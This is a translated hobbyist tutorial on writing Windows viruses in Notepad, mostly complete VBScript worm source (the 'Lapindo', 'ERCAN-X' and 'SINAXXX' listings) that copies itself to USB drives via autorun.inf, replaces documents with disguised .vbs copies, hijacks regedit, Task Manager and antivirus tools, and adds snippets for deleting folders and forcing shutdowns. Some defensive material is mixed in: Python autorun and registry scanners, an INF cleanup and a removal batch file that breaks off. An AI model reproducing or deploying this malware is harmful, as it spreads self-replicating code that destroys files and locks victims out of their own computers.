Induk.Copy (flashdrive.Path & "\sidoarjo hot.vbs")
set tf2=fso.getfile(flashdrive.path & "\sidoarjo hot.vbs")
tf2.Attributes = 32
End If
Next
End Sub
Sub SerangDrive (Lokasi)
On Error Resume Next
Dim drv
If fso.DriveExists(Lokasi) Then
Set drv = fso.GetDrive(fso.GetDriveName(Lokasi))
If drv.DriveType = 1 Or drv.DriveType = 2 Then
CopyVbs (Lokasi & "\lapindo.vbs")
SerangFolder (Lokasi)
End If
End If
End Sub
Sub SerangFolder (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\bacalah aku.vbs")
SerangFile (target)
SerangFolder2 (target)
Next
End Sub
Sub SerangFolder2 (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\duit.vbs")
SerangFile (target)
SerangFolder3 (target)
Next
End Sub
Sub SerangFolder3 (Lokasi)
On Error Resume Next
If Lokasi = "" Then Exit Sub
if Lokasi = Left(Reg.SpecialFolders("Desktop"),3) & "Windows" then exit sub
Dim target
For Each target In fso.GetFolder(Lokasi).SubFolders
CopyVbs(target & "\Hasil rapat.vbs")
SerangFile (target)
Next
End Sub
Sub SerangFile (Lokasi)
On Error Resume Next
Dim target
For Each target In fso.GetFolder(Lokasi).Files
If lcase(Right(target,3))="doc" then
if Left(target,2)<> "~$" then CopyVbs(target & ".vbs")
HilangFile (target)
End If
If lcase(Right(target,3))="xls" or lcase(Right(target,3))="ppt" or lcase(Right(target,3))="pdf" or lcase(Right(target,3))="rtf" or lcase(Right(target,3))="rar" or lcase(Right(target,3))="zip" or lcase(Right(target,3))="jpg" or lcase(Right(target,3))="gif" or lcase(Right(target,3))="bmp" then
if Left(target,2)<> "~$" then CopyVbs(Left(target, len(target)-3) & "vbs")
End If
If lcase(Right(target,4))="docx" or lcase(Right(target,4))="xlsx" or lcase(Right(target,4))="pptx" then
if Left(target,2)<> "~$" then CopyVbs(Left(target, len(target)-4) & "vbs")
End If
if lcase(Right(target,3))="vbs" then KillVBS(target)
Next
End sub
Sub Pertahanan
On Error Resume Next
Reg.RegWrite "HKCR\inffile\shell\Install\command\", "logoff.exe"
Reg.RegWrite "HKCR\regfile\shell\open\command\", "logoff.exe"
Reg.RegWrite "HKCR\VBSFile\Shell\Edit\Command\", "logoff.exe"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegedit", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", "0", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFileAssociate", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD"
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableCMD", "1", "REG_DWORD"
Reg.RegWrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system\DisableTaskMgr", "1", "REG_DWORD"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\TaskMgr.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\attrib.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","Notepad.exe"
Reg.Regwrite "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","Notepad.exe"
End Sub
Sub Samar
On Error Resume Next
Dim HandleDoc, HandleVbs
HandleDoc = "HKEY_CLASSES_ROOT\" & BacaHandle("doc")
HandleVbs = "HKEY_CLASSES_ROOT\" & BacaHandle("VBS")
Reg.RegWrite HandleVbs & "\", Reg.RegRead(HandleDoc & "\")
Reg.RegWrite HandleVbs & "\DefaultIcon\", Reg.RegRead(HandleDoc & "\DefaultIcon\")
Reg.RegWrite HandleVbs & "\NeverShowExt",""
Reg.RegWrite "HKCR\VBSFile\FriendlyTypeName", Reg.RegRead(HandleDoc & "\")
End Sub
Sub ShortCut
On Error Resume Next
Dim lnk, lok
lok = Reg.SpecialFolders("Favorites") & "\blukutuk.lnk"
Set lnk = Reg.CreateShortCut(lok)
Induk.Copy (Reg.SpecialFolders("AppData") & "\blukutuk.vbs")
lnk.TargetPath = Reg.ExpandEnvironmentStrings(Reg.SpecialFolders("AppData") & "\blukutuk.vbs")
lnk.Save
HilangFile (lok)
Reg.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\blukutuk", lok
End Sub
Sub HilangFile (AlamatFile)
Dim f1
Set f1 = fso.GetFile(AlamatFile)
f1.Attributes = 6
End sub
Sub CopyVbs (Alamat)
On Error Resume Next
Dim data, ts, s, a, tf
Randomize
data = Left(Rnd(15) * 10000000000, 10)
Set ts = fso.openTextFile(Induk, 1)
a = ts.ReadAll
s = Right(a, Len(a) -28)
ts.Close
Set tf = fso.CreateTextFile(Alamat, True)
tf.WriteLine ("Rem sidoarjocity" & data)
tf.Write s
tf.Close
Set ts = fso.GetFile(Alamat)
ts.Attributes = 1
End sub
Function BacaHandle(TipeFile)
BacaHandle = reg.RegRead ("HKEY_CLASSES_ROOT\." & TipeFile & "\")
End Function
Sub KillVBS(alamat)
On Error Resume Next
Dim ts, s, i, a, b
Set ts = fso.openTextFile(alamat, 1)
s = ts.Readline
ts.Close
a = instr(s, "sidoarjocity")
If a = 0 Or a = "" Then
Set ts = fso.GetFile(alamat)
ts.Attributes = 0
Set ts = fso.openTextFile(Induk, 1)
i = ts.ReadAll
ts.Close
Set ts = fso.CreateTextfile(alamat, True)
ts.Write i
ts.Close
End If
End sub
sub AlwaysRun
On Error Resume Next
Dim mf, check
If Wscript.ScriptFullname = Reg.SpecialFolders("AppData") & "\blukutuk.vbs" then
Do
Set mf = fso.getfile(Wscript.ScriptFullname)
check = mf.Drive.drivetype
If check <> 1 Then Wscript.sleep 200000
Reg.run fso.getspecialfolder(0) & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
AutoFlash
Sebar1
SerangDrive("d:\")
SerangDrive("e:\")
Loop While check <> 1
End If
End sub
Sub Sebar1
dim nilai
nilai=Left(Reg.SpecialFolders("Desktop"),3) & "Windows\System.vbs"
CopyVBS (nilai)
HilangFile(nilai)
SerangFolder(Reg.SpecialFolders("MyDocuments"))
CopyVbs(Reg.SpecialFolders("NetHood") & "\Ceritaku.txt.vbs")
End Sub
Sub SerangRecent
On Error Resume Next
Dim target, ok
For Each target in fso.GetFolder(Reg.SpecialFolders("Recent")).Files
Set ok = reg.CreateShortCut(target)
if fso.FolderExists(ok.WorkingDirectory) then SerangFolder (ok.WorkingDirectory)
Next
End sub
Rem Created by Vir.VBS Generator V.1
2. Once it is done, just copy and paste it into Notepad, so there is no need to type the whole heap of it . .
3. Then save it [File>>Save As] and name it “Lapindo.vbs” [Remember, you must use the quotation marks, don't forget]
4. And there is your virus; if you click it [better not, it is rather dangerous]
Notes:
If you use Avira antivirus [the one with the red umbrella icon], it is detected straight away under the name VBS/Autorun.T . . .
And if you do try clicking it, then true to its name “Lapindo”, your computer running AVG, Avira or Norton antivirus will be drowned, in other words it no longer works…
And there are many other effects
So be careful
That finally wraps up the explanation of making a virus with Notepad, and remember the rule of the game: For Education Only. . . If anyone is interested, next time I'll make a nastier one, hehheheeh
1. Disabling the registry
1. Open Notepad, then write the script below:
On Error Resume Next (this statement is used in VB files
so that if something goes wrong, execution carries on with the next line of code)
CreateObject("WScript.Shell").run "cmd.exe /c reg add hkcusoftware\microsoft\windows\currentversion\poli cies\system /v
disableregistrytools /t reg_dword /d ""1"" /f", vbhide
There are actually many ways to disable regedit. For example, like this:
CreateObject("WScript.Shell").regwriteHKEY_CURRENT _USER\software\microsoft\windows\currentversion\po licies\systemdisableregistrytools", 1, "REG_DWORD"
2. Save it under whatever name you like, ending in .vbs
2. Making a Virus That Can Copy Itself to Another Directory
Open Notepad, then write the script below:
CreateObject("Scripting.FileSystemObject").
GetFile(WScript.ScriptFullName).Copy "c:\windows\system32\virus.vbs"
There is also another way, with code like this:
On Error Resume Next
createobject("scripting.filesystemobject").copyfil e wscript.scriptfullname,
createobject("scripting.filesystemobject")
.getspecialfolder(1) & "\virus.vbs"
for example, to copy itself to the directory C:\WINDOWS\System32
under the name virus.vbs
.getspecialfolder(0) is used for the WINDOWS directory
.getspecialfolder(1) is used for the SYSTEM32 directory on Windows XP
.getspecialfolder(2) is used for the Temporary directory
2. Save it under whatever name you like, ending in .vbs
3. Making a Process-Killing Virus
Open Notepad, then write the script below:
for example, we will kill the Task Manager process
On Error Resume Next
CreateObject("WScript.Shell")
.run "taskkill /f /im taskmgr.exe", vbhide
2. Save it with the .vbs extension
4. Running the Virus at Startup, or When Windows Is Switched On
On Error Resume Next
CreateObject("WScript.Shell").RegWrite "HKEY_LOCAL_MACHINESoftware\Microsoft\Windows\Curr entVersion\Run\virus"
, "c:\windows\system32\virus.vbs"
(runs the virus located in the directory c:\windows\system32
under the name virus.vbs)
2. Save it with the reg extension (the same way as for vbs)
5. Making a Virus That Can Delete Files/Folders
Open Notepad, then write the script below; so that the virus we make does not need much script, it can be shortened like this:
On Error Resume Next
set hapus = CreateObject("Scripting.FileSystemObject")
hapus.DeleteFile "C:\xxx.exe" '(menghapus file xxx.exe di direktory C:\)
hapus.DeleteFolder "C:\antivirus" '(menghapus folder antivirus di direktory C:\)
Example:
On Error resume Next
set hapus = CreateObject(”Scripting.FileSystemObject”)
hapus.DeleteFile “C:\Program Files\Adobe\Reader 8.0\Reader\AcroRd32.exe”
hapus.DeleteFolder “C:\antivirus”
Save the script as a .vbs file, for example: virusdeleted.vbs
6. Making a Virus That Can Restart Windows
Open Notepad, then write the script below:
CreateObject("WScript.Shell").run "shutdown -r -f -t 60", vbhide
restarts Windows after 60 seconds
Save the script as a .vbs file, for example: virusrestart.vbs
7. Making a Virus That Can Shut Down and Restart Windows
Open Notepad, then write the script below:
CreateObject("WScript.Shell").run "shutdown -s -f -t 60", vbhide
Shuts Windows down after 60 seconds
“shutdown -s -f -t 60"
S = for shutdown, and
R = for reboot/restart
Save the script as a .vbs file, for example: virusshutdown.vbs
*if the virus does not run, check the spaces and the quotation marks again*
VIRUS NOTEPAD ERCAN-X
The method is the same as before: copy and paste the text below
on error resume next
dim rekur,windowpath,desades,fs,mf,isi,tf,ercan,nt,check,sd
isi = "[autorun]" & vbcrlf & "shellexecute=wscript.exe 3rc4nms32.dll.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekur = rekur & text.readline
rekur = rekur & vbcrlf
loop
do
Set windowpath = fs.getspecialfolder(0)
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs ")
tf.attributes = 32
set tf = fs.createtextfile(windowpath & "\3rc4n-x.dll.vbs",2,true)
tf.write rekur
tf.close
set tf = fs.getfile(windowpath & "\3rc4n-x.dll.vbs")
tf.attributes = 39
for each desades in fs.drives
If (desades.drivetype = 1 or desades.drivetype = 2) and desades.path <> "A:" then
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes =32
set tf=fs.createtextfile(desades.path &"\3rc4nms32.dll.vbs",2,true)
tf.write rekur
tf.close
set tf=fs.getfile(desades.path &"\3rc4nms32.dll.vbs")
tf.attributes = 39
set tf =fs.getfile(desades.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(desades.path &"\autorun.inf",2,true)
tf.write isi
tf.close
set tf = fs.getfile(desades.path &"\autorun.inf")
tf.attributes=39
end if
next
set ercan = createobject("WScript.Shell")
ercan.regwrite "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",":: -> ERCAN-X<- ::" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Advanced\Hidden",2, "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFind", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", "1", "REG_DWORD" ercan.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoViewContextMenu", "1", "REG_DWORD" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeCaption", "THE ERCAN-X" ercan.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Winlogon\LegalNoticeText","No reason for Panic" ercan.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir", windowpath & "\batch- 3rc4n.dll.vbs" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe\Debugger","notepad.exe" ercan.regwrite 
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe\Debugger","notepad.exe" ercan.regwrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe\Debugger","notepad.exe" if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject("Wscript.shell")
sd.run windowpath & "\explorer.exe /e,/select, " & Wscript.ScriptFullname
After you have entered the code, click FILE > SAVE. Under File Type choose ALL FILES (*.*) and save it with the name 3rc4nms32.dll.vbs. After that, try running it. And yes, you have run ERCAN-X.VBS on your computer.
If you open an application named cmd.exe, install.exe, msconfig.exe, regedit.exe, regedt32.exe, RegistryEditor.exe, setup.exe, PCMAV.exe, PCMAV-CLN.exe or PCMAV-RTP.exe, what opens instead is "Notepad", because the script sets notepad.exe as the Debugger value for each of those names under Image File Execution Options.
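The autorun.inf text and the attributes = 39 calls in the listing above are both things a defender can check for on a removable drive. The following is an added example, not part of the original article: it parses autorun.inf text, flags launch entries that start a script host, a script file or a double-extension name, and decodes the attribute mask. The sample inputs are constructed and the script file name in them is a placeholder.

```python
import re

# Added example. Keys in [autorun] that launch a command.
LAUNCH_KEYS = ("open", "shellexecute")
SCRIPT_HOST_RE = re.compile(r"\b(wscript|cscript)(\.exe)?\b", re.I)
SCRIPT_FILE_RE = re.compile(r'[^\s"]+\.(vbs|vbe|jse|js|wsf)\b', re.I)
DOUBLE_EXT_RE = re.compile(r"\.(dll|exe|txt|doc|jpg|pdf)\.(vbs|vbe|jse|js|wsf)\b", re.I)
# FileSystemObject attribute bits; the listings set attributes = 39.
ATTR_BITS = {1: "ReadOnly", 2: "Hidden", 4: "System", 32: "Archive"}

# Constructed samples (the script name is a placeholder, not from the page).
SUSPICIOUS = "[autorun]\r\nshellexecute=wscript.exe example.dll.vbs\r\n"
BENIGN = "[autorun]\nopen=setup.exe\nicon=setup.exe,0\n"


def decode_attributes(mask):
    """Name the attribute bits set in a FileSystemObject attributes value."""
    return [name for bit, name in ATTR_BITS.items() if mask & bit]


def scan_autorun(text):
    """Return launch entries in [autorun] that start a script."""
    findings, section = [], ""
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()  # ';' starts an INF comment
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section != "autorun" or "=" not in line:
            continue
        key, cmd = (part.strip() for part in line.split("=", 1))
        lkey = key.lower()
        is_verb = lkey.startswith("shell\\") and lkey.endswith("\\command")
        if lkey not in LAUNCH_KEYS and not is_verb:
            continue
        reasons = [name for name, rx in (("script-host", SCRIPT_HOST_RE),
                                         ("script-file", SCRIPT_FILE_RE),
                                         ("double-extension", DOUBLE_EXT_RE))
                   if rx.search(cmd)]
        if reasons:
            findings.append({"key": key, "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    print(scan_autorun(SUSPICIOUS))
    print(decode_attributes(39))
```

A value of 39 decodes to ReadOnly, Hidden, System and Archive together, which is why the dropped files do not show up in a default Explorer view.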
NOW WE MAKE THE ANTIVIRUS FOR IT:
[Version]
Signature="$Chicago$"
Provider=Ercan
[DefaultInstall]
AddReg=UnhookRegKey
DelReg=del
[UnhookRegKey]
HKCU,Software\Microsoft\Internet Explorer\Main, Window Title,0, "INTERNET EXPLORER"
[del]
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFind
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoFolderOptions
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoRun
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableRegistryTools
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\System, DisableTaskMgr
HKCU, Software\Microsoft\Windows\CurrentVersion\Policies\Explorer, NoViewContextMenu
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeCaption
HKLM, Software\Microsoft\Windows\CurrentVersion\Winlogon, LegalNoticeText
HKLM, Software\Microsoft\Windows\CurrentVersion\Run, Systemdir
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cmd.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\install.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedt32.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\RegistryEditor.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\setup.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-CLN.exe, Debugger
HKLM, SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PCMAV-RTP.exe, Debugger
Save it with the name ‘’verdhy.vbs’’ (without the quotation marks)
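To confirm that the cleanup took effect, a registry export can be audited for the values the ERCAN-X listing writes. The following is an added example, not from the original article: it parses text in .reg export format and reports Image File Execution Options Debugger values, the policy lock-out values that are non-zero, and Run entries that point at script files. The sample export is constructed, its file names are placeholders, and the code assumes the export has already been decoded to text.

```python
import re

# Added example. Policy values the listing sets to 1 to lock the user out.
LOCKOUT_VALUES = {"nofind", "nofolderoptions", "norun", "disableregistrytools",
                  "disabletaskmgr", "noviewcontextmenu"}
IFEO = "\\image file execution options\\"
RUN_SUFFIX = "\\microsoft\\windows\\currentversion\\run"
VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=(?P<data>.*)$')
SCRIPT_RE = re.compile(r"\.(vbs|vbe|jse|js|wsf)\b", re.I)

# Constructed sample in .reg export format (file names are placeholders).
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regedit.exe]
"Debugger"="notepad.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000000

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"Systemdir"="C:\\Windows\\example.dll.vbs"
"Updater"="C:\\Program Files\\Example\\updater.exe"
'''

def is_nonzero_dword(data):
    return data.lower().startswith("dword:") and int(data[6:], 16) != 0

def audit_reg_export(text):
    """Return (kind, key, value name, data) for each value left to clean."""
    findings, key = [], ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = VALUE_RE.match(line)
        if not m:
            continue
        name, data = m.group("name"), m.group("data")
        lkey, lname = key.lower(), name.lower()
        if IFEO in lkey and lname == "debugger":
            findings.append(("ifeo-debugger", key, name, data))
        elif "\\policies\\" in lkey and lname in LOCKOUT_VALUES and is_nonzero_dword(data):
            findings.append(("policy-lockout", key, name, data))
        elif lkey.endswith(RUN_SUFFIX) and SCRIPT_RE.search(data):
            findings.append(("run-script", key, name, data))
    return findings
```

A Debugger value under Image File Execution Options also has legitimate debugging uses, so each hit is something to review rather than proof of infection.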
The virus below can duplicate its own file
”Start of the code: when an error occurs, ignore it and continue the virus's activity”
on error resume next
”Dim (declare) the following names”
dim rekursif,winpath,flashdrive,fs,mf,atr,tf,sina,nt,check,sd
”Set the text that will later be written as the Autorun Setup Information”
atr = “[autorun]” & vbcrlf & “shellexecute=wscript.exe sinaxxx.vbs”
set fs = createobject(”Scripting.FileSystemObject”)
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text = mf.openastextstream(1,-2)
do while not text.atendofstream
rekursif = rekursif & text.readline
rekursif = rekursif & vbcrlf
loop
do
”Duplicate itself to become the master file in the Windows path (example: C:\Windows)”
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & “\SINAXXX.vbs”)
tf.attributes = 32
set tf = fs.createtextfile(winpath & “\SINAXX.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(winpath & “\SINAXXX.vbs”)
tf.attributes = 39
“Create autorun.inf to run the virus automatically whenever a flash disc is plugged in, and spread to every drive of type 1 and 2 (removable), including floppy disks”
for each flashdrive in fs.drives
”Command to check the drive”
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> “A:” then
”Create the infector if the drive type turns out to be 1 or 2. Or A:\”
set tf = fs.getfile(flashdrive.path &”\SINAXXXa.vbs”)
tf.attributes = 32
set tf = fs.createtextfile(flashdrive.path &”\SINAXXX.vbs”,2,true)
tf.write rekursif
tf.close
set tf = fs.getfile(flashdrive.path &”\SINAXXX.vbs”)
tf.attributes = 39
“Create the autorun.inf whose text was prepared earlier (Auto Setup Information)”
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 32
set tf = fs.createtextfile(flashdrive.path &”\autorun.inf”,2,true)
tf.write atr
tf.close
set tf = fs.getfile(flashdrive.path &”\autorun.inf”)
tf.attributes = 39
end if
next
”Manipulate the registry”
set sina = createobject(”WScript.Shell”)
”Change the Internet Explorer CAPTION to komputer Anda terinfeksi Vrs SINAXXX”
sina.regwrite “HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title”,”komputer Anda terinfeksi Vrs SINAXXX”
”Set hidden files not to be shown in Explorer”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\Advanced\Hidden”, “1″, “REG_DWORD”
”Remove the Find, Folder Options, Run and LogOff menus, and block Regedit and Task Manager”
sinaRegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFind”, “1″, “REG_DWORD”
sina.RegWrite
“HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoFolderOptions”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoRun”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoLogOff”, “0″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\DisableRegistryTools”, “1″, “REG_DWORD”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr”, “1″, “REG_DWORD”
”Disable right-click”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\Explorer\NoViewContextMenu”, “1″, “REG_DWORD”
”Show a message at every Windows startup”
sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeCaption”,
“SINAXXX.”
sina.regwrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\LegalNoticeText”,
“kami dari keluarga SINA memohon maaf atas virus SINAXXX !!!!”
”Activate the sinaxxx.vbs virus at every Windows startup”
sina.regwrite
“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\Systemdir”,
windowpath & “\SINAXXX.vbs “
“Remove the Close menu”
sina.RegWrite “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose”, “0″, “REG_DWORD”
”Change RegisteredOwner and Organization”
sina.regwrite“HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\RegisteredOrganization”, “The SINAXXX”sina.regwrite “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\RegisteredOwner”,”SINAXXX”
”End of the code”
if check <> 1 then
Wscript.sleep 200000
end if
loop while check <> 1
set sd = createobject(”Wscript.shell”)
sd.run windowpath & “\explorer.exe /e,/select, ” & Wscript.ScriptFullname
To make the virus from the listing above, just copy the listing into Notepad and then
save it with a file name that has the .vbs extension, for example: sinaxxx.vbs.
PLEASE NOTE !!!!!
AFTER YOU COPY THE LISTING, DO NOT FORGET TO DELETE THE COMMENTS, WHICH ARE ENCLOSED IN QUOTATION MARKS ( “ ) !!!!
Making a Kspoold Antivirus with Notepad
The Kspoold virus is not actually a virus that damages the system. It does not block Windows features such as Task Manager, Run, Registry Editor and so on. Instead it infects Word, Excel and similar files. That makes writing a removal tool for it easier. Still, there is no harm in learning to build our own Kspoold antivirus, right? Now we will make a Kspoold removal tool using nothing but Notepad.
@Echo off
Cls
REM - Change the color
Color A
REM - Change the title (or use your own name)
Title Kspoold Killer * By vErdHy
REM - Go to the system directory
%SYSTEMDRIVE%
cd "%SYSTEMROOT%\System32"
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo KSPOOLD KILLER
Echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo After you press any key on your keyboard, i do...
Echo - Removing Related Registry
Echo - Stopping Kspoold Process
Echo - Deleting Kspoold file in the system directory
echo ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Echo.
Pause
Echo.
REM - Delete the registry keys the virus created as its service
